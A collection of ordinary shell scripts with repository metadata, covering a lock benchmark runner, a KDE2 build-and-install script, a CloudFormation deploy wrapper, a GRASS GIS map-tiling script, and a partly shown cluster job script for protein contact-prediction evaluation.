d3f99d25848f0f03b3a8a145c02cb7e9b80466cc | Shell | kirakira-cxm/shfllock | /benchmarks/parsec/run.sh | UTF-8 | 1,356 | 2.9375 | 3 | [] | no_license | #!/bin/bash
set -x
# $1 --> iso input to be used, fedora-core image provided in the dataset
INPUT_ISO=$1
LOCK_DIR=./../../ulocks/src/litl
LOCKS=(libmcs_spinlock.sh libhmcs_original.sh \
libaqswonode_spinlock.sh libcbomcs_spinlock.sh \
libcna_spinlock.sh libmalthusian_spinlock.sh \
libpthreadinterpose_original.sh libmutexee_original.sh \
libmcstp_original.sh libaqmwonode_spin_then_park.sh)
DIR=streamcluster-results
for i in `seq 1 1`
do
for l in ${LOCKS[@]}
do
mkdir -p ${DIR}/$i/$l
for c in 1 2 4 12 `seq 24 24 192`
do
/usr/bin/time ${LOCK_DIR}/${l} \
taskset -c 0-$(($c-1)) \
./pkgs/kernels/streamcluster/inst/amd64-linux.gcc/bin/streamcluster \
10 20 32 4096 4096 1000 none output.txt $c 2>> ${DIR}/$i/$l/core.${c} >> ${DIR}/$i/$l/core.${c}
done
done
done
LOCKS=(libpthreadinterpose_original.sh libhmcs_original.sh \
libmcs_spinlock.sh libcna_spinlock.sh \
libaqswonode_spinlock.sh libaqmwonode_spin_then_park.sh)
DIR=dedup-results
for i in `seq 1 1`
do
for l in ${LOCKS[@]}
do
mkdir -p ${DIR}/$i/$l
for c in 1 2 4 12 `seq 24 24 192`
do
/usr/bin/time ${LOCK_DIR}/${l} \
./pkgs/kernels/dedup/inst/amd64-linux.gcc/bin/dedup \
-c -p -v \
-i ${INPUT_ISO} \
-o /dev/null -t $c 2>> ${DIR}/$i/$l/core.${c} >> ${DIR}/$i/$l/core.${c}
done
done
done
| true |
077aa1e7d31a1401fd84be73463d6129807f1b45 | Shell | raverjulie/lists | /axp-list/August2000/att-ade-rebuild_ | UTF-8 | 12,133 | 3.515625 | 4 | [] | no_license | #!/bin/bash
################################################################################
# Compiles a KDE2 snapshot. #
# 2000 by Frerich Raabe <raabe@kde.org> #
################################################################################
# Where are your KDE sources?
#
SRCDIR=/discs/c7/kdeb4
# Where shall I put the binaries?
#
KDE2DIR=/discs/deskapps/built/kde
# Where is your Qt 2.2.0?
#
QTDIR=/discs/c7/kde-built/qt-2.2.0-beta2
# If you would like logfiles of the compilation process, specify a directory
# here in which the logfiles will be saved. If you want to disable logfile
# generation, leave this blank.
#
LOGDIR=$SRCDIR/log
# It is a good idea to remove the configuration directories of the previous
# KDE desktop by deleting ~/.kderc and ~/.kde. If you would like to have this
# script do this automatically for you, add the home directories of the users
# whose KDE configuration should be resetted to this space seperated list.
#
HOMEDIR=""
# Do you want the logfiles to be compressed? Set this variable to "yes" to
# make the script compress the logfiles using bzip2 (using gzip as a
# fallback is bzip2 cannot be found) and thereby save some diskspace
COMPRESSLOGS=yes
# Add modules you want to get compiled to this space-seperated list. Please
# note that the modules kde-qt-addon, kdesuppor, kdelibs, and kdebase
# (if you want a KDE2 desktop and not just develope applications for it)
# must be compiled in exactly that order. Any other modules are optional.
#
MODULES="kdesupport kdelibs kdebase kdegraphics kdenetwork \
kdegames kdeadmin kdetoys kdeutils kdepim kdemultimedia koffice"
# Do you want a clean install? This is recommended but please note that
# you cannot use your previous KDE2 desktop while the compilation is
# running. Set this to "no" to install the new snapshot over the previous
# one, otherwise set it to "yes".
#
INSTALLFROMSCRATCH=no
# Do you plan to use this box otherwise while compiling? If so, you'd
# probably set this variable to "yes". If this is set to "no", the
# compilation process will try to eat up all the ressources, which speeds up
# the overall progress but makes it a PITA to work on this box. ;)
#
COMPILENICE=yes
# Set this variable to "yes" to actiave certain cheap tweaks to speed up the
# compilation process. Those tweaks mainly consist of lowering the
# optimization of the resulting binary code.
#
TWEAKCOMPILE=yes
## Don't modify anything below this line! ######################################
# These strings are defined as variables to make the output look more
# consistent.
#
STR_OKAY="done!"
STR_ERROR="failed!"
# The variables whose name is prefixed with ERR_ hold the error codes which
# are returned by the script and depend on the reason for aborting the
# execution.
#
# No error has been noticed, everything seems to be fine.
#
ERR_NO_ERROR=0
# Could not change into a directory of a module - wrong owner/access
# settings?
#
ERR_CHANGE_INTO_MOD_DIR=1
# Could not find the file 'Makefile.in' for a module, mostly happens if
# 'make -f Makefile.cvs' hasn't been executed for a module.
#
ERR_NO_MAKEFILE_IN=2
# The 'configure' command failed for a module because the system doesn't
# support certain features - I hope you activated logfile generation... ;)
#
ERR_CONFIGURE_FAIL=3
# The compilation of a module failed - if the module is defined in
# $CRITICAL_MODULES (see below) the execution is aborted, otherwise the script
# will continue with the next module.
#
ERR_COMPILE_FAIL=4
# The installation of a module failed - this mostly happens if there's not
# enough free disk space on the partition which $KDE2DIR is mounted to.
#
ERR_INSTALL_FAIL=5
# The $SRCDIR variable wasn't set or contains a non-existant directory.
#
ERR_INV_SRCDIR=6
# The $QTDIR variable wasn't set, points to a non-existant directory or
# doesn't contain a bin/, lib/, or include/ subdirectory.
#
ERR_INV_QTDIR=7
# Certain modules depend on others - those "base" modules which are required
# by others to compile and/or run should be listed here to ensure that the
# script is aborted.
#
CRITICAL_MODULES="kde-qt-addon kdesupport kdelibs kdebase"
# Internal variable, do not change.
#
DATE=`date +%Y%m%d`
# This function computes the time which was needed for a certain task.
#
compute_time() {
DURATION=$[$(date +%s)-$STARTTIME]
HOURS=$[$DURATION / 3600]
MINUTES=$[$[$DURATION % 3600] / 60]
SECONDS=$[$DURATION % 60]
}
# This function installs a compiled CVS module.
#
install_module() {
echo -n " Installing..."
test $LOGDIR && STARTTIME=`date +%s`
if eval "$MAKE_INSTALL"; then
if test $LOGDIR; then
compute_time
echo "Time needed for installation of module $MODULE: $HOURS:$MINUTES:$SECONDS" >> $MAKE_INSTALL_LOG
fi
test $CMD_COMPRESS && $CMD_COMPRESS $MAKE_INSTALL_LOG
echo -e $STR_OKAY
echo "Module $MODULE successfully installed in $KDE2DIR!"
if test "$MODULE" = kdebase -a -n $HOMEDIR; then
for HOME in $HOMEDIR; do
test -d $HOME/.kde -a -w $HOME/.kde && rm -rf $HOME/.kde
test -e $HOME/.kderc -a -w $HOME/.kderc && rm -f $HOME/.kderc
done
fi
else
echo -e $STR_ERROR
echo $CRITICAL_MODULES | grep -q $MODULE && exit $ERR_INSTALL_FAIL
fi
}
# Various checks to ensure that valid data has been specified, creates the
# directory for the logfile in case it doesn't exist already.
#
if test -n "$LOGDIR" -a ! -d "$LOGDIR"; then
if ! mkdir -p "$LOGDIR" > /dev/null 2>&1; then
echo "WARNING: Could not create logfile-directory."
echo "WARNING: Logfile generation deactivated."
LOGDIR=""
fi
else
if test -n "$LOGDIR" -a ! -w "$LOGDIR"; then
echo "WARNING: Could not obtain write access to specified logfile-directory."
echo "WARNING: Logfile generation deactivated."
LOGDIR=""
fi
fi
test $LOGDIR && STR_ERROR="$STR_ERROR\x00a\x00d\x020\x020Check the logfile in $LOGDIR for further info."
if test ! -d "$SRCDIR"; then
echo "ERROR: Invalid source directory specified!"; exit $ERR_INV_SRCDIR
fi
if test ! -d "$QTDIR" -o ! -d "$QTDIR/lib" -o ! -d "$QTDIR/bin" -o ! -d "$QTDIR/include"; then
echo "ERROR: Invalid Qt directory specified!"; exit $ERR_INV_QTDIR
fi
if test -x /usr/bin/bzip2; then
CMD_COMPRESS="/usr/bin/bzip2"
else
if test -x /usr/bin/gzip; then
CMD_COMPRESS="/usr/bin/gzip"
else
echo "WARNING: Neither bzip2 nor gzip was found, disabling compression of logfiles."
CMD_COMPRESS=""
fi
fi
# Clean the installation directory if selected.
#
if test "$INSTALLFROMSCRATCH" = yes; then
if test ! -w $KDE2DIR; then
echo "Enter the root password to clean the installation directory."
echo "WARNING: All files and directories in $KDE2DIR will be deleted!"
echo -n ""
su -c"rm -rf $KDE2DIR/*"
else
rm -rf $KDE2DIR/*
fi
fi
# Optionally activate cheap tweaks.
#
if test "$TWEAKCOMPILE" = yes; then
CFLAGS="-O0"
CXXFLAGS="-O0"
export CFLAGS CXXFLAGS
fi
# Actually start doing something.
#
for MODULE in $MODULES; do
if ! cd $SRCDIR/$MODULE; then
if echo $CRITICAL_MODULES | grep -q $MODULE; then
echo "ERROR: Could not change into directory $SRCDIR/$MODULE!"
exit $ERR_CHANGE_INTO_MOD_DIR
else
echo "WARNING: Could not change into directory $SRCDIR/$MODULE."
echo "WARNING: Skipping module $MODULE."
fi
else
cd $SRCDIR/$MODULE
# Check whether 'make -f Makefile.cvs' has been called.
#
if test ! -e Makefile.in; then
if echo $CRITICAL_MODULES | grep -q $MODULE; then
echo "ERROR: Please execute 'make -f Makefile.cvs' first for this module!"
exit $ERR_NO_MAKEFILE_IN
else
echo "WARNING: 'make -f Makefile.cvs' seems not to be executed for this"
echo "WARNING: module, skipping compilation."
fi
else
echo "Building module: $MODULE"
# Configure the module.
#
echo -n " Configuring..."
CONFIGURE="configure --enable-debug --enable-profile --prefix=$KDE2DIR --with-qt-libs=$QTDIR"
test "$NICECOMPILE" = yes && CONFIGURE="nice $CONFIGURE"
CONFIGURE_LOG="$LOGDIR/$MODULE-configure-$DATE"
if test $LOGDIR; then
CONFIGURE="$CONFIGURE > $CONFIGURE_LOG 2>&1"
STARTTIME=`date +%s`
fi
if eval "$CONFIGURE"; then
if test $LOGDIR; then
compute_time
echo "Time needed for configuration of module $MODULE: $HOURS:$MINUTES:$SECONDS" >> $CONFIGURE_LOG
fi
test $CMD_COMPRESS && $CMD_COMPRESS $CONFIGURE_LOG
echo -e $STR_OKAY
# Compile the module.
#
echo -n " Compiling..."
MAKE="make"
MAKE_LOG="$LOGDIR/$MODULE-build-$DATE"
echo $CRITICAL_MODULES | grep -q $MODULE || MAKE="$MAKE -k"
if test $LOGDIR; then
MAKE="$MAKE > $MAKE_LOG 2>&1"
STARTTIME=`date +%s`
fi
test "$NICECOMPILE" = yes && MAKE="nice $MAKE"
if eval "$MAKE"; then
if test $LOGDIR; then
compute_time
echo "Time needed for compilation of module $MODULE: $HOURS:$MINUTES:$SECONDS" >> $MAKE_LOG
fi
test $CMD_COMPRESS && $CMD_COMPRESS $MAKE_LOG
echo -e $STR_OKAY
# Install the module.
#
MAKE_INSTALL="make install"
MAKE_INSTALL_LOG="$LOGDIR/$MODULE-install-$DATE"
test $LOGDIR && MAKE_INSTALL="$MAKE_INSTALL > $MAKE_INSTALL_LOG 2>&1"
test "$NICECOMPILE" = yes && MAKE_INSTALL="nice $MAKE_INSTALL"
if test ! -w $KDE2DIR; then
echo " Please enter the root password to install module $MODULE."
echo -n " "
su -c"install_module"
else
install_module
fi
else
echo -e $STR_ERROR
echo $CRITICAL_MODULES | grep -q $MODULE && exit $ERR_COMPILE_FAIL
fi
else
echo -e $STR_ERROR
echo $CRITICAL_MODULES | grep -q $MODULE && exit $ERR_CONFIGURE_FAIL
fi
fi
fi
done
exit $ERR_NO_ERROR
=head1 NAME
kde-rebuild - Recompiles a tree of KDE CVS modules
=head1 SYNOPSIS
kde-rebuild
=head1 DESCRIPTIONS
kde-rebuild is intended to recompile a tree of KDE source modules. Those
modules have to be saved in a common directory, e.g. /kde-cvs/kdelibs,
/kde-cvs/kdebase, /kde-cvs/kdegraphics etc. The script will take care
of compiling them in the correct order, checks for dependencies and
solves them. Before first invokation, the variables at the top of the
file should be filled with appropriate values to reflect the local
setup.
Please note that KDE sources which have been downloaded via cvs,
anoncvs or cvsup have to be prepared in a special matter (e.g. execute
'make -f Makefile.cvs' and, for cvsup, link kde-common/admin to
./admin) to be compile ready. Sources which have been aquired from
tarballs or source RPMs should be compile-ready. Refer to the
according documentation at http://www.kde.org/cvsup.html for detailed
information.
=head1 RETURN VALUE
The following error codes are returned by the script.
0 - No error seems to have occured
1 - The script could not change into the directory of a module
2 - The script could not open the file 'Makefile.in' of a module
3 - The configuration of a module failed
4 - The compilation of a module failed
5 - The installation of a module failed
6 - An invalid source directory was specified
7 - An invalid Qt directory was specified
=head1 EXAMPLES
cd /home/devel/src/scripts; kde-rebuild
=head1 BUGS
Lots, mostly that the script wasn't written with portability in mind
and therefore won't run very nice on platforms other than Linux.
=head1 AUTHOR
Frerich Raabe <raabe@kde.org>
=cut
| true |
aa94cf21c8707d78a7af90cd44c3aa99ecfaeb3c | Shell | benMain/PainLogger-ui | /cfn/deploy.sh | UTF-8 | 686 | 3.15625 | 3 | [] | no_license | #!/bin/sh
set -e
#Build up the parameters and Tags
params=`cat ${1}-parameters-${2}.json \
| jq '.[] | (.ParameterKey + "=" +.ParameterValue)' \
| sed -e 's/"//g' \
| sed -e $'s/\r//g' | tr '\n' ' '`
tags=`cat ${1}-tags-common.json \
| sed -e 's/ *//g' \
| tr '()' '-' \
| jq '.[] | (.Key + "=" +.Value)' \
| sed -e 's/"//g' \
| sed -e 's/[ \t]//g' \
| sed -e $'s/\r//g' | tr '\n' ' '`
# Update the Cloudformation Stack.
aws cloudformation deploy --region us-east-1 \
--no-fail-on-empty-changeset \
--template-file ${1}-cfn.yaml \
--stack-name ${1}-${2} \
--capabilities CAPABILITY_NAMED_IAM \
--parameter-overrides $params \
--tags $tags
| true |
a1878feb441bc9799a19d96a07cfe03feadf8d7c | Shell | byronbest/aws-grass6-process-server | /unit_process/tile.grass | UTF-8 | 6,750 | 3.25 | 3 | [] | no_license | #!/bin/bash
#env RUN
#env LINE
#env MINZOOM
#env MAXZOOM
if [ "X${NAME}" == "X" ] ; then NAME=default ; fi
if [ "X${MINZOOM}" == "X" ] ; then MINZOOM=2 ; fi
if [ "X${MAXZOOM}" == "X" ] ; then MAXZOOM=9 ; fi
to="+30 minutes"
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo ${BASH_SOURCE}
swk=tile
mkdir -p $TARGETDIR/url/${NAME}
for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
echo -n "" \
> ${TARGETDIR}/url/${NAME}/${i}.json
done
if [ "X$KML" == "X" ] ; then
echo "$TIME CREATE $RUN LINE=$LINE"
echo "$LINE," \
| perl -ne 'BEGIN{$/=",";}s/,$//;if($.%2==1){$lat=$_;}else{$lon=$_;}if($.>1&&$.%2==0){print"$lon,$lat\n";}' \
| v.in.ascii -n fs=, output=$RUN
else
echo "$TIME CREATE $RUN KML=$KML"
v.in.ogr -e dsn=$TARGETDIR/shapefiles output=$RUN
fi
echo "$TIME CREATE ${LINE_LOCATION} $RUN"
g.mapset -c location=${LINE_LOCATION} mapset=$RUN
g.region -d -a vect=$RUN@PERMANENT -bg
#g.mapset location=${UNIT_LOCATION} mapset=${EDWG_MAPSET}
eval `g.region -bg`
minlat=$ll_s
minlon=$ll_w
maxlat=$ll_n
maxlon=$ll_e
echo "$TIME CREATE ${GMAP_LOCATION} $RUN"
g.mapset -c location=${GMAP_LOCATION} mapset=$RUN
for ((zoom=${MINZOOM};$zoom<=${MAXZOOM};zoom++)) {
if [ $zoom -gt ${MINZOOM} ] ; then c="," ; else c="" ; fi
for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
echo "$c[$zoom" \
>> ${TARGETDIR}/url/${NAME}/${i}.json
done
#res=`echo "$RESOLUTION*(2^($MAXZOOM-$zoom))" | bc`
factor=`echo "2^$zoom" | bc`
lon_tile_size=`echo "360/$factor" | bc -l`
lat_tile_size=`echo "180/$factor" | bc -l`
sw_col=`echo "(180+$minlon)/$lon_tile_size" | bc -l`
ne_col=`echo "(180+$maxlon)/$lon_tile_size" | bc -l`
ne_row=`echo "(90-$maxlat)/$lat_tile_size" | bc -l`
sw_row=`echo "(90-$minlat)/$lat_tile_size" | bc -l`
sw_col=`echo "($sw_col)/1" | bc`
ne_col=`echo "($ne_col+0.5)/1" | bc`
ne_row=`echo "($ne_row)/1" | bc`
sw_row=`echo "($sw_row+0.5)/1" | bc`
for ((x=${sw_col};$x<=${ne_col};x++)) {
for ((y=${ne_row};$y<=${sw_row};y++)) {
xmin=`echo "$x*$lon_tile_size-180" | bc -l`
ymax=`echo "90-$y*$lat_tile_size" | bc -l`
xmax=`echo "$xmin+$lon_tile_size" | bc -l`
ymin=`echo "$ymax-$lat_tile_size" | bc -l`
mkdir -p $TARGETDIR/$swk/$zoom/${BLM_COST}
mkdir -p $TARGETDIR/$swk/$zoom/${EDWG_COST}
mkdir -p $TARGETDIR/$swk/$zoom/${LANDCOV_COST}
mkdir -p $TARGETDIR/$swk/$zoom/${SLOPE_COST}
#mkdir -p $TARGETDIR/$swk/$zoom/${VEG_COST}
g.mapset location=${LINE_LOCATION} mapset=$RUN
g.region -d w=$xmin s=$ymin e=$xmax n=$ymax
v.in.region output=$REGION --overwrite
g.mapset location=${GMAP_LOCATION} mapset=$RUN
g.region -d
v.proj location=${LINE_LOCATION} mapset=$RUN input=$REGION --overwrite
g.region vect=$REGION rows=512 cols=512
eval `g.region -bg`
for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
p="http://wecc-scdt-public.s3.amazonaws.com/tile/${zoom}/${i}/${x}_${y}.png"
echo ",[$ll_s,$ll_w,$ll_n,$ll_e,\"$p\"]" \
>> ${TARGETDIR}/url/${NAME}/${i}.json
done
if [ ! -e ${TARGETDIR}/$swk/$zoom/${BLM_COST}/${x}_${y}.png ] ; then
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME CREATE $BLM_COST in $RUN from $BLM_MAPSET column $BLM_COLUMN"
v.proj input=${BLM_COST} location=${UNIT_LOCATION} mapset=${BLM_MAPSET}
v.to.rast input=${BLM_COST} layer=${BLM_LAYER} \
output=${BLM_COST} use=attr column=${BLM_COLUMN} --overwrite
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME LABEL with $BLM_WEIGHTS"
r.category map=${BLM_COST} rules=${UNIT_PARAMETERS}/${BLM_WEIGHTS}
r.colors map=${BLM_COST} color=rules rules=${UNIT_PARAMETERS}/${BLM_COLORS}
r.out.png -t input=${BLM_COST} \
output=${TARGETDIR}/$swk/$zoom/${BLM_COST}/${x}_${y}.png
g.remove rast=${BLM_COST} vect=${BLM_COST}
fi
if [ ! -e ${TARGETDIR}/$swk/$zoom/${EDWG_COST}/${x}_${y}.png ] ; then
TIME=`date +"%Y-%M-%D %H:%M:%S"`
#echo "$TIME CREATE $EDWG_COST in $RUN from $EDWG_MAPSET column $EDWG_COLUMN"
#v.to.rast input=${EDWG_COST}@${EDWG_MAPSET} layer=${EDWG_LAYER} \
#output=${EDWG_COST} use=attr column=${EDWG_COLUMN} --overwrite
echo "$TIME CREATE $EDWG_COST in $RUN from $EDWG_MAPSET"
r.proj input=${EDWG_COST} mapset=${EDWG_MAPSET} location=${UNIT_LOCATION} \
memory=$RASTER_SIZE
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME LABEL with $EDWG_WEIGHTS"
r.category map=${EDWG_COST} rules=${UNIT_PARAMETERS}/${EDWG_WEIGHTS}
r.colors map=${EDWG_COST} color=rules rules=${UNIT_PARAMETERS}/${EDWG_COLORS}
r.out.png -t input=${EDWG_COST} \
output=${TARGETDIR}/$swk/$zoom/${EDWG_COST}/${x}_${y}.png
g.remove rast=${EDWG_COST}
fi
if [ ! -e ${TARGETDIR}/$swk/$zoom/${LANDCOV_COST}/${x}_${y}.png ] ; then
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME CREATE $LANDCOV_COST in $RUN from $LANDCOV_MAPSET"
r.proj input=${LANDCOV_COST} mapset=${LANDCOV_MAPSET} \
location=${UNIT_LOCATION} memory=$RASTER_SIZE
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME LABEL with $LANDCOV_WEIGHTS"
r.category map=${LANDCOV_COST} rules=${UNIT_PARAMETERS}/${LANDCOV_WEIGHTS}
r.colors map=${LANDCOV_COST} color=rules \
rules=${UNIT_PARAMETERS}/${LANDCOV_COLORS}
r.out.png -t input=${LANDCOV_COST} \
output=${TARGETDIR}/$swk/$zoom/${LANDCOV_COST}/${x}_${y}.png
g.remove rast=${LANDCOV_COST}
fi
if [ ! -e ${TARGETDIR}/$swk/$zoom/${SLOPE_COST}/${x}_${y}.png ] ; then
TIME=`date +"%Y-%M-%D %H:%M:%S"`
#echo "$TIME CREATE $SLOPE_COST in $RUN from $SLOPE_MAPSET column $SLOPE_COLUMN"
#v.to.rast input=${SLOPE_COST}@${SLOPE_MAPSET} layer=${SLOPE_LAYER} \
#output=${SLOPE_COST} use=attr column=${SLOPE_COLUMN} --overwrite
echo "$TIME CREATE $SLOPE_COST in $RUN from $SLOPE_MAPSET"
r.proj input=${SLOPE_COST} mapset=${SLOPE_MAPSET} location=${UNIT_LOCATION} \
memory=$RASTER_SIZE
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME LABEL with $SLOPE_WEIGHTS"
r.category map=${SLOPE_COST} rules=${UNIT_PARAMETERS}/${SLOPE_WEIGHTS}
r.colors map=${SLOPE_COST} color=rules rules=${UNIT_PARAMETERS}/${SLOPE_COLORS}
r.out.png -t input=${SLOPE_COST} \
output=${TARGETDIR}/$swk/$zoom/${SLOPE_COST}/${x}_${y}.png
g.remove rast=${SLOPE_COST}
fi
#if [ ! -e ${TARGETDIR}/$swk/$zoom/${VEG_COST}/${x}_${y}.png ] ; then
#TIME=`date +"%Y-%M-%D %H:%M:%S"`
#echo "$TIME CREATE $VEG_COST in $RUN from $VEG_MAPSET column $VEG_COLUMN"
#v.to.rast input=${VEG_COST}@${VEG_MAPSET} layer=${VEG_LAYER} \
#output=${VEG_COST} use=attr column=${VEG_COLUMN} --overwrite
#TIME=`date +"%Y-%M-%D %H:%M:%S"`
#echo "$TIME LABEL with $VEG_WEIGHTS"
#r.category map=${VEG_COST} rules=${UNIT_PARAMETERS}/${VEG_WEIGHTS}
#r.colors map=${VEG_COST} color=rules rules=${UNIT_PARAMETERS}/${VEG_COLORS}
#r.out.png -t input=${VEG_COST} \
#output=${TARGETDIR}/$swk/$zoom/${VEG_COST}/${x}_${y}.png
#g.remove rast=${VEG_COST}
#fi
g.remove vect=$REGION
}
}
for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
echo "]" \
>> ${TARGETDIR}/url/${NAME}/${i}.json
done
}
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME finished $TARGETDIR"
| true |
fbeca3879f3242620e797d70079161c17585917b | Shell | susannvorberg/contact_prediction | /contact_prediction/run/run_update_evaluation_files_randomforest_models.sh | UTF-8 | 11,176 | 2.703125 | 3 | [] | no_license | #!/usr/bin/env bash
##################################################################################################################
#
# Update evaluation (and meta) files with new scores
# from Random Forest model trained on different features
#
###################################################################################################################
#-------------------------------------------------------------------------------
# load modules
#-------------------------------------------------------------------------------
module load anaconda/2
source activate py27
module load C/msgpack
module load C/armadillo
module load contactprediction/contact_prediction
#------------------------------------------------------------------------------
# set up OpenMP with only one thread to make sure that is does not use more
#------------------------------------------------------------------------------
export OMP_NUM_THREADS=8
echo "using " $OMP_NUM_THREADS "threads for omp parallelization"
#-------------------------------------------------------------------------------
# example call
#-------------------------------------------------------------------------------
#bash ~/opt/contactprediction/contact_prediction/run/run_update_evaluation_files_randomforest_models.sh
#-------------------------------------------------------------------------------
# function with actual call
#-------------------------------------------------------------------------------
function run_update_script {
method_name=$1
parameter_path=$2
braw_pll_path=$3
braw_cd_path=$4
mat_baypost_path=$5
mat_logbayfac_path=$6
script_path=$7
echo "---------"
echo -e "add method\t $method_name"
echo -e "parameter_path:\t $parameter_path"
settings="/usr/users/svorber/work/data/benchmarkset_cathV4.1/dataset/dataset_properties/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/psicov/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/psipred/hhfilter_results_n5e01/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/netsurfp/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/local_methods/mi_pc/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/local_methods/omes_fodoraldrich/"
settings=$settings" $parameter_path"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/evaluation/"
settings=$settings" $method_name"
settings=$settings" --n_proteins 1000"
settings=$settings" --n_threads $OMP_NUM_THREADS"
settings=$settings" --sequence_separation 12"
settings=$settings" --contact_threshold 8"
if [ "$braw_pll_path" != false ];
then
echo -e "braw_pll_path:\t $braw_pll_path"
settings=$settings" --pll_braw "$braw_pll_path
fi
if [ "$braw_cd_path" != false ];
then
echo -e "braw_cd_path:\t $braw_cd_path"
settings=$settings" --cd_braw "$braw_cd_path
fi
if [ "$mat_baypost_path" != false ];
then
echo -e "mat_baypost_path:\t $mat_baypost_path"
settings=$settings" --bayposterior_mat "$mat_baypost_path
fi
if [ "$mat_logbayfac_path" != false ];
then
echo -e "mat_logbayfac_path:\t $mat_logbayfac_path"
settings=$settings" --bayesfactor_mat "$mat_logbayfac_path
fi
echo "Settings: "$settings
jobname=update_eval_files.$method_name
bsub -W 24:00 -q mpi -m "mpi mpi2 mpi3_all hh sa" -n $OMP_NUM_THREADS -R span[hosts=1] -a openmp -J $jobname -o job-$jobname-%J.out $script_path/contact_prior/add_to_evaluation_files.py $settings
echo "---------"
}
#-------------------------------------------------------------------------------
# RF
#-------------------------------------------------------------------------------
#method_name="rf_contact_prior"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_75features.pkl"
#braw_pll_path="false"
#braw_cd_path="false"
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL
#-------------------------------------------------------------------------------
#method_name="pLL-L2normapc-RF"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc/200000contacts_1000000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
#braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
#braw_cd_path="false"
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + CD
#-------------------------------------------------------------------------------
#method_name="cd-RF"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_cd/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
#braw_pll_path="false"
#braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + Bayesian posterior
#-------------------------------------------------------------------------------
method_name="bayPost-RF"
parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_baypost/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
braw_pll_path="false"
braw_cd_path=" false "
mat_baypost_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/posterior/ "
mat_logbayfac_path=" false "
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + Bayesian likelihood (log BF)
#-------------------------------------------------------------------------------
method_name="logBF-RF"
parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_baylogbf/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
braw_pll_path="false"
braw_cd_path=" false "
mat_baypost_path=" false "
mat_logbayfac_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/logbf/ "
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL + CD
#-------------------------------------------------------------------------------
#method_name="pLL-cd-RF"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc_cd/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
#braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
#braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
